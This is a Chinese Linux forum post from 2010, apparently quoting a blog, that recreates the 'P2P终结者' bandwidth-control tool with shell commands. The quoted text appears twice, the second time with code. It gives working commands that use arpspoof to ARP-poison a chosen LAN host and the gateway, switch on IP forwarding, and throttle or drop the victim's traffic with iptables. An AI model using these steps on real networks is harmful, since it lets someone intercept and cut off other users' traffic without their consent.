P2P 终结者 for Linux 出现啦
发表于 : 2010-11-20 21:54
参考。
http://microcai.gsalex.net/archives/201 ... linux.html
下面是摘抄
很长一段时间,都在渴望一个 for Linux 的 P2P 终结者。
但是,谁让我们是小众群体呢?所以,没有。
但是,今天我突发奇想,找到了!用脚本实现了 P2P 终结者!
问题是这样的,首先我需要一个 arp 欺骗工具。呵呵, dsniff 就是!
执行 arpspoof 就可以进行 ARP 欺骗了。 不过,呵呵,我只对需要控制的主机进行 ARP 欺骗,比如 192.168.1.100
这样成功的让 192.168.1.100 到 192.168.1.1 之间的通讯全部通过自己了
然后,我打开 内核的 IP 转发。
呵呵,现在,怎么限速就是我的事情啦! 可以使用 tc 限速,也可以简单的时候 iptables 限速!
比如,使用 iptables 的 limit 匹配模块来限速. 一秒钟是能发送和接收 3 个数据包,这样速度就限制到 4k/s 了
当然,你也可以使用 tc 进行更高级的流量控制。
http://microcai.gsalex.net/archives/201 ... linux.html
下面是摘抄
很长一段时间,都在渴望一个 for Linux 的 P2P 终结者。
但是,谁让我们是小众群体呢?所以,没有。
但是,今天我突发奇想,找到了!用脚本实现了 P2P 终结者!
问题是这样的,首先我需要一个 arp 欺骗工具。呵呵, dsniff 就是!
执行 arpspoof 就可以进行 ARP 欺骗了。 不过,呵呵,我只对需要控制的主机进行 ARP 欺骗,比如 192.168.1.100
代码: 全选
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
然后,我打开 内核的 IP 转发。
代码: 全选
echo 1 > /proc/sys/net/ipv4/ip_forward 呵呵,现在,怎么限速就是我的事情啦! 可以使用 tc 限速,也可以简单的时候 iptables 限速!
比如,使用 iptables 的 limit 匹配模块来限速. 一秒钟是能发送和接收 3 个数据包,这样速度就限制到 4k/s 了
代码: 全选
iptables -A FORWARD -s 192.168.1.100 \
-m limit --limit 3/s -j ACCEPT
iptables -A FORWARD -d 192.168.1.100 \
-m limit --limit 3/s -j ACCEPT
iptables -A FORWARD -s 192.168.1.100 -j DROP
iptables -A FORWARD -d 192.168.1.100 -j DROP
